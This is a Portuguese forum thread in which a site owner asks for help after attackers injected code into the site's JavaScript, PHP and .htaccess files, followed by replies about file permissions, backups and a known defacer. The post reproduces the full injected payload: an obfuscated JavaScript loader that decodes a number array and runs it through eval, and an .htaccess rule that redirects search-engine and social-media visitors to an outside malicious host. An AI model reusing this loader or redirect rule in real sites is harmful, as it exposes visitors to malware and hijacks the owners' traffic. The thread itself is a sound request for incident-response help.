Jump to content
pluis3103

Sites atacados ( ficheiros .htacess php e js )

Recommended Posts

pluis3103

Boa noite pessoal,

Estou com um problema, alguns dos meus sites estão a ser atacados. O ataque acontece sobre os ficheiros .htacess, js e alguns php.

O que acontece é que é escrito nos ficheiros o seguinte:

.ficheiros javascript e php:

#336988#
<script type=\"text/javascript\" language=\"javascript\">try{window.document.body++}catch(gdsgsdg){dbshre=9;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,110,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,110,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,93,108,105,40,45,97,38,97,105,104,92,38,105,102,42,90,107,108,41,96,106,92,39,106,99,103,31,52,7,5,23,24,25,26,110,37,107,109,115,103,92,38,105,105,110,96,108,98,105,105,23,53,25,33,92,89,107,104,102,112,107,93,32,53,8,1,24,25,26,27,106,38,108,110,116,99,93,39,92,106,105,92,94,108,27,52,24,32,42,34,50,5,3,26,27,23,24,108,40,110,107,113,101,95,41,95,93,98,97,99,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,107,39,109,111,112,100,94,40,114,96,92,109,98,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,110,37,107,109,115,103,92,38,101,95,97,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,107,39,109,111,112,100,94,40,111,102,104,25,55,27,30,41,105,114,34,50,5,3,7,5,23,24,25,26,100,93,24,33,27,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,110,30,33,34,26,118,4,2,25,26,27,23,24,25,26,27,91,103,92,111,104,92,102,109,40,114,105,97,109,95,35,30,52,93,99,113,23,97,93,55,87,30,107,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,110,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,106,33,52,7,5,23,24,25,26,120,4,2,118,35,35,32,51);s=\"\";for(i=0;i-447!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>";

#/336988#

ficheiros .htacess:

#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|
allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|
arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|
brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|
clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|
euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|
finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|
friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|
goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-
information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|
kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|
live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|
msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|
passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|
searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|
startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|
telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|
topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|
webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|
wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://aceoot.org/esd.php [R=301,L]
</IfModule>
#/336988#

Alguém me pode ajudar com isto? como posso impedir que estes ficheiros sejam afectados e escritos?

Share this post


Link to post
Share on other sites
pmg

Altera as permissoes de escrita desses ficheiros de forma a que o servidor web nao os possa alterar.


What have you tried?

Não respondo a dúvidas por PM

A minha bola de cristal está para compor; deve ficar pronta para a semana.

Torna os teus tópicos mais atractivos e legíveis usando a tag CODE para colorir o código!

Share this post


Link to post
Share on other sites
apocsantos

Boa noite,

Acede por FTP e altera as permissões. No entanto se o servidor estiver "comprometido" isto de pouco irá servir... Recentemente li que um "black-hat", anda a atacar sites em quantidade, recorrendo a falhas tanto nos servidores como nas plataformas... Por acaso não deixa uma mensagem a dizer que "You have been defeaced by hmei7" ??

Se for esse o caso, verifica todos os ficheiros e se tiveres cópias de segurança, repõe as cópias, pois certamente já te alterou mais ficheiros.

Cordiais cumprimentos,

Apocsantos


"A paciência é uma das coisas que se aprendeu na era do 48k" O respeito é como a escrita de código, uma vez perdido, dificilmente se retoma o habito"

Share this post


Link to post
Share on other sites
pluis3103

Boa noite,

Acede por FTP e altera as permissões. No entanto se o servidor estiver "comprometido" isto de pouco irá servir... Recentemente li que um "black-hat", anda a atacar sites em quantidade, recorrendo a falhas tanto nos servidores como nas plataformas... Por acaso não deixa uma mensagem a dizer que "You have been defeaced by hmei7" ??

Se for esse o caso, verifica todos os ficheiros e se tiveres cópias de segurança, repõe as cópias, pois certamente já te alterou mais ficheiros.

Cordiais cumprimentos,

Apocsantos

Viva,

Em primeiro lugar obrigado pelas vossas respostas. Ele não deixa qualquer mensagem. Apenas coloca o código que inseri em cima nos ficheiros js(todos) .htacess e index.php

Share this post


Link to post
Share on other sites
donatello

Boas :)

@pluis3103

Este site está referenciado como tendo malware por Google Safebrowsing e outros.

Recentemente li que um "black-hat", anda a atacar sites em quantidade, recorrendo a falhas tanto nos servidores como nas plataformas... Por acaso não deixa uma mensagem a dizer que "You have been defeaced by hmei7" ??

Também li que houve um ataque e foi deixada a mensagem "hacked by Hmei7" num x.txt em / do site.

Li aqui [http://www.websegura.net/2012/12/hmei7-atacou-centenas-sites-portugueses/] e ainda há sites com esse ficheiro.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.